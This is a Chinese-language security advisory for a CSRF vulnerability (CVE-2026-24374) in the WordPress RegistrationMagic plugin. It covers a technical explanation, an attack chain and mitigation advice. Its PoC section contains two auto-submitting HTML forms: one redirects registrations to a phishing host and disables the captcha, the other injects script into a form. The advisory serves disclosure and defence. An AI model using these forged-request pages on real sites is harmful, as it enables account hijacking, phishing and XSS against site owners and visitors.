CVE-2026-24374 WordPress RegistrationMagic插件跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-24374

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager (WordPress插件)

漏洞概述

CVE-2026-24374是WordPress插件RegistrationMagic（自定义注册表单构建器及提交管理器）中的一个跨站请求伪造（CSRF）漏洞。该插件版本小于等于6.0.6.9存在此安全缺陷。攻击者可以利用此漏洞诱导已登录的管理员或用户在不知情的情况下执行非预期的操作，如修改插件设置、创建恶意注册表单或窃取用户敏感信息。RegistrationMagic是一款广泛使用的WordPress注册表单管理插件，允许网站管理员创建自定义注册表单、收集用户提交数据、管理用户账户等。由于该插件直接处理用户注册和表单提交功能，CSRF漏洞可能导致严重的安全后果，包括用户账户被劫持、恶意内容注入以及敏感数据泄露等。漏洞存在于插件的多个功能端点中，缺少适当的CSRF令牌验证机制，使得攻击者可以构造恶意请求诱导受害者执行未授权操作。

技术细节

该CSRF漏洞源于RegistrationMagic插件在处理关键操作时未正确实施CSRF保护机制。攻击原理如下：1）漏洞位置：插件在处理表单提交、用户注册、设置修改等操作时，未对请求来源进行有效验证；2）攻击条件：攻击者需要构造一个恶意网页或链接，诱导已登录WordPress后台的管理员或具有表单管理权限的用户访问；3）利用方式：攻击者创建一个包含自动提交表单的HTML页面，该表单携带伪造的请求参数，指向目标网站的插件端点，由于浏览器会自动携带受害者的Cookie信息，服务器无法区分是否为合法请求；4）影响范围：可导致注册表单配置被篡改、恶意脚本被注入表单、用户提交数据被窃取或重定向、插件功能被恶意利用等；5）修复方案：在所有状态变更操作中添加CSRF Token验证，使用WordPress的wp_verify_nonce函数验证请求合法性，确保表单提交来源于同站点的合法页面。

攻击链分析

STEP 1

步骤1

攻击者创建恶意网页或钓鱼邮件，包含自动提交的表单，指向目标WordPress网站的RegistrationMagic插件端点

STEP 2

步骤2

诱导已登录WordPress后台的管理员或具有插件管理权限的用户访问该恶意页面

STEP 3

步骤3

浏览器自动携带受害者的认证Cookie向目标站点发送POST请求，由于缺少CSRF验证，服务器将其视为合法操作

STEP 4

步骤4

攻击者成功执行未授权操作，如修改表单设置、注入恶意代码、窃取提交数据或劫持用户账户

STEP 5

步骤5

后续访问该表单的用户会受到XSS攻击或被重定向到恶意网站，导致更大范围的安全事件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-24374 CSRF PoC for RegistrationMagic Plugin -->
<!-- This PoC demonstrates CSRF attack on RegistrationMagic <= 6.0.6.9 -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - RegistrationMagic</title>
</head>
<body>
    <h1>CSRF Attack PoC for CVE-2026-24374</h1>
    <p>Malicious page that tricks admin into modifying plugin settings</p>
    
    <!-- Form to modify RegistrationMagic settings -->
    <form id="csrfForm" action="http://target-site/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="rm_form_submission" />
        <input type="hidden" name="form_id" value="1" />
        <input type="hidden" name="rm_action" value="update_settings" />
        <input type="hidden" name="rm_settings[redirect_url]" value="http://malicious-site.com/phishing" />
        <input type="hidden" name="rm_settings[enable_captcha]" value="0" />
        <input type="hidden" name="_wpnonce" value="" />
    </form>
    
    <!-- Auto-submit form without user interaction -->
    <script>
        document.getElementById('csrfForm').submit();
        // Attack succeeds if victim is logged in as admin
        // Browser automatically includes session cookies
    </script>
    
    <p>If you see this message, the attack failed or was already executed.</p>
</body>
</html>

<!-- Alternative: Stored XSS + CSRF combined attack -->
<!-- This PoC demonstrates modifying form settings to inject malicious content -->
<!DOCTYPE html>
<html>
<body>
    <form id="maliciousForm" action="http://target-site/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="rm_form_editor_save" />
        <input type="hidden" name="form_id" value="1" />
        <input type="hidden" name="form_data[form_name]" value="Malicious Registration Form" />
        <input type="hidden" name="form_data[form_html]" value="<script>alert('XSS')</script>" />
        <input type="hidden" name="_wpnonce" value="" />
    </form>
    <script>document.getElementById('maliciousForm').submit();</script>
</body>
</html>

影响范围

RegistrationMagic (WordPress插件) <= 6.0.6.9

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1）临时禁用RegistrationMagic插件或限制其功能；2）使用Web应用防火墙（WAF）规则拦截异常请求；3）手动审查插件生成的所有表单，移除可疑内容；4）启用双因素认证（2FA）保护WordPress管理员账户；5）限制管理员账户的使用环境，避免在公共网络下访问后台；6）定期检查用户注册记录和表单提交日志，及时发现异常行为。建议尽快应用官方发布的安全更新，因为CSRF漏洞可能被组合利用造成更严重的后果。